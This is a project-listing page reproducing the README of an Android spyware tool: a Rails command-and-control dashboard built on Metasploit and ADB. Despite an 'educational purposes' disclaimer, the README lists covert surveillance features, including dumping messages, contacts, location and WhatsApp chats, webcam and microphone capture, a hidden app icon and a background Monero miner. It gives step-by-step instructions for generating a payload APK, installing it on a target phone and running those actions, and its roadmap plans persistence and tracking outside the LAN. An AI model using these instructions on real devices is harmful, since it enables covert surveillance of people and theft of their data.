All Projects β†’ CanciuCostin β†’ android-spyware

CanciuCostin / android-spyware

Licence: MIT License
Rails c&c web application for spying Android devices

Programming Languages

HTML
75241 projects
python
139335 projects - #7 most used programming language
ruby
36898 projects - #4 most used programming language
javascript
184084 projects - #8 most used programming language
SCSS
7915 projects
C++
36643 projects - #6 most used programming language

Projects that are alternatives of or similar to android-spyware

halfstaff
πŸ‡ΊπŸ‡Έ Is the US flag at half-staff?
Stars: ✭ 22 (-82.26%)
Mutual labels:  ruby-on-rails
LocalSupport
A directory of local support services and volunteer opportunities
Stars: ✭ 60 (-51.61%)
Mutual labels:  ruby-on-rails
BlogArticle
My known and what i learning
Stars: ✭ 41 (-66.94%)
Mutual labels:  ruby-on-rails
ffxiv-collect
Another collection tracker for Final Fantasy XIV
Stars: ✭ 32 (-74.19%)
Mutual labels:  ruby-on-rails
shizoid
Shizoid chatter bot on Ruby
Stars: ✭ 37 (-70.16%)
Mutual labels:  ruby-on-rails
Horus-Eye
Just Simple Code To Play With Android Payloads (;
Stars: ✭ 54 (-56.45%)
Mutual labels:  metasploit-framework
slack widgets
An abstraction of the JSON structure needed to create widgets in Slack message attachments
Stars: ✭ 14 (-88.71%)
Mutual labels:  ruby-on-rails
ror-capstone
Ruby on Rails app to track activities and assign a group to them
Stars: ✭ 15 (-87.9%)
Mutual labels:  ruby-on-rails
stimulus todomvc
[WIP] An implementation of TodoMVC using Ruby on Rails and StimulusJS
Stars: ✭ 14 (-88.71%)
Mutual labels:  ruby-on-rails
uploadcare-rails
Rails wrapper for Uploadcare
Stars: ✭ 48 (-61.29%)
Mutual labels:  ruby-on-rails
arask
Automatic RAils taSKs.
Stars: ✭ 31 (-75%)
Mutual labels:  ruby-on-rails
veue
Veue was a live video streaming service, and this is the code built over ~10 months by Hampton Catlin, Konnor Rogers, Sirbuland Atlas, and a handful of others.
Stars: ✭ 49 (-60.48%)
Mutual labels:  ruby-on-rails
mysql2-lambda
Precompiled Mysql2 Gem for AWS Lambda
Stars: ✭ 19 (-84.68%)
Mutual labels:  ruby-on-rails
rails hotwire base
Rails + Hotwire base app
Stars: ✭ 54 (-56.45%)
Mutual labels:  ruby-on-rails
ohloh-ui
Web Application for the Ohloh Stack.
Stars: ✭ 72 (-41.94%)
Mutual labels:  ruby-on-rails
matestack-docs
Documentation of matestack-ui-core built with matestack itself, consuming Github API for content
Stars: ✭ 14 (-88.71%)
Mutual labels:  ruby-on-rails
examples
Examples of NuID's zero knowledge authentication and key management facilities in various languages and frameworks. Open an Issue or PR if you'd like to see your favorite tool here.
Stars: ✭ 42 (-66.13%)
Mutual labels:  ruby-on-rails
ruby-vips-lambda
AWS Lambda Layer for Ruby Libvips Gem
Stars: ✭ 34 (-72.58%)
Mutual labels:  ruby-on-rails
circulate
An operating system for lending libraries
Stars: ✭ 51 (-58.87%)
Mutual labels:  ruby-on-rails
Room-Meter
Room Meter is a hotel review site where users can create reviews in form of articles and vote on other reviews. It's built with the Ruby on Rails framework by following the MVP pattern
Stars: ✭ 12 (-90.32%)
Mutual labels:  ruby-on-rails

Rails Contributors Issues MIT License LinkedIn


Logo

Android Spyware

Report Bug Β· Request Feature

Table of Contents

About The Project

Dashboard Screen Shot

Educational purpose, command & control, web GUI based Android spyware built around Metasploit & ADB.

The tool:

  • Uses Docker containers to simulate a Kali Linux environment with the metasploit framework
  • Uses RPC calls to communicate with the Metasploit framework API
  • Uses ADB to install the payload on the target device & implement additional functionalities (the device must be in the same LAN)

Disclaimer

This software is for educational purposes only. Using the tool for spying real devices is strictly illegal. USE THE SOFTWARE AT YOUR OWN RISK. THE AUTHOR ASSUMES NO RESPONSIBILITY FOR YOUR USAGE.

We strongly recommend you to have coding and Docker knowledge. Do not hesitate to read the source code and understand the mechanism of the tool.

Built With

Features

Available actions using Metasploit framework

  • Dump System Info
  • Dump Location
  • Live Webcam Stream
  • Dump Messages
  • Change Audio Mode
  • Dump Call Logs
  • Dump Local Time
  • Microphone Recording - Only working for Android < 9.0
  • Unistall App
  • List Installed Apps
  • Send Message
  • Dump Contacts
  • Lock/Unlock Screen
  • Run Shell Command
  • Webcam Snap
  • Open App
  • Install App
  • Device Info
  • Hide/Show payload app icon

Additional actions via ADB

  • Dump Whatsapp conversations from backup DB (disabled for safety reasons)
  • Dump Wi-Fi Information
  • Screen Snap
  • Upload File
  • Record Screen
  • Pull File
  • Start Monero crypto miner in background

Getting Started

Prerequisites

Installation

  1. Install ADB via Chocolatey. From an elevated powershell prompt (Run as administrator):
choco install adb --version=1.0.39
  1. Create a project directory, and download docker-compose file. You can use curl:
curl https://raw.githubusercontent.com/CanciuCostin/android-spyware/master/docker/docker-compose.yml -o docker-compose.yml
  1. Download required images:
docker-compose pull

Deployment

  1. Start ADB server from a command prompt:
adb server
  1. Optional, set your Google MAPS API Key in docker-compose file for dashboard widget
  2. Start the container (inside the project directory):
docker-compose up
  1. Wait for the containers to initialize, and access the application in the browser via http://localhost/admin The files directory will be created. It will contain the payloads and the actions outputs.

Usage

  1. Ensure USB Debugging is enabled on your Android device tutorial HERE
  2. Optional: Plug-in your Android device to the laptop via USB - Otherwise you won't be able to use ADB functions and you will have to install the malware manually
  3. Open the rails app in the browser: http://localhost/admin and login. Default credentials:

User: [email protected]

Password: password

  1. Generate APK
  • Check your machine IP address on LAN. For windows you can use
ipconfig

Ipconfig Screen Shot

  • Go to Payloads (http://localhost/admin/apk_payloads) and Create New
  • Select port 4444, input the machine IP address and give a name for the APK
  • The APK payload will be generated in [project path]/files/payloads
  1. Install APK
  • Go to APK Installations (http://localhost/admin/apk_installations) and Create New
  • Select your previously generated apk from the list and leave the target as usb
  • You might have to approve a prompt on the device
  1. Run Actions
  • Go to Remote (http://localhost/admin/remote)
  • Open the installed app on your device. You should see green light for your MSF connectivity right after. The ADB should also turn green if your device is plugged via USB
  • Run actions by clicking on the app-looking icons on the device widget. The output will be displayed in the terminal widget, and the output will be stored in [project path]/files/dumps Remote Screen Shot

Debugging Issues

MSF/ADB connection issues (green light not appearing in Remote page)

  • Ensure you generated the apk with correct machine IP
  • Ensure connection from smartphone to your machine is not blocked by local firewall. Otherwise you should allow connection on ports 2222, 3333, 4444. To check that, you can try to access http://[your machine IP]:2222 . You should be able to access the MSF container file system via http server
  • Ensure Docker container - HOST connectivity is working. Host machine is accessed via gateway.docker.internal, which is set in docker-compose file. If that doesn't work for you, you can also try to replace it with docker.host.internal
  • For ADB connection, you can try to restart the local server:
adb kill-server
adb server
  • For ADB connection, ensure USB debugging is enabled

Build

Software requirements

Rails Server build steps:

git clone https://github.com/CanciuCostin/android-spyware.git
cd android-spyware
gem install bundler:2.1.4
bundle
npm install yarn -g
yarn install --check-files

Ensure the following environment variables are set:

ANDROIDSPYWARE_DATABASE_HOST=localhost
ADB_HOST=localhost
RAILS_HOST=127.0.0.1

Run the server:

rails server
  • Note: local postgresql database can also be used as alternative, but you will need to run the rake scripts for initialization:
rake db:create //alternatively run createdb android_spyware_[developmen|test|production]
rake db:schema:load
rake db:seed /too add mock data required for start-up

Roadmap

  • Implement "Instructions" page
  • Implement option for persistence script (connection is lost after reboot)
  • Implement option for public IP handler (either ngrok or cloud solution) to be able to track device outside of LAN

License

Distributed under the MIT License. See LICENSE for more information.

Contact

[email protected]

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].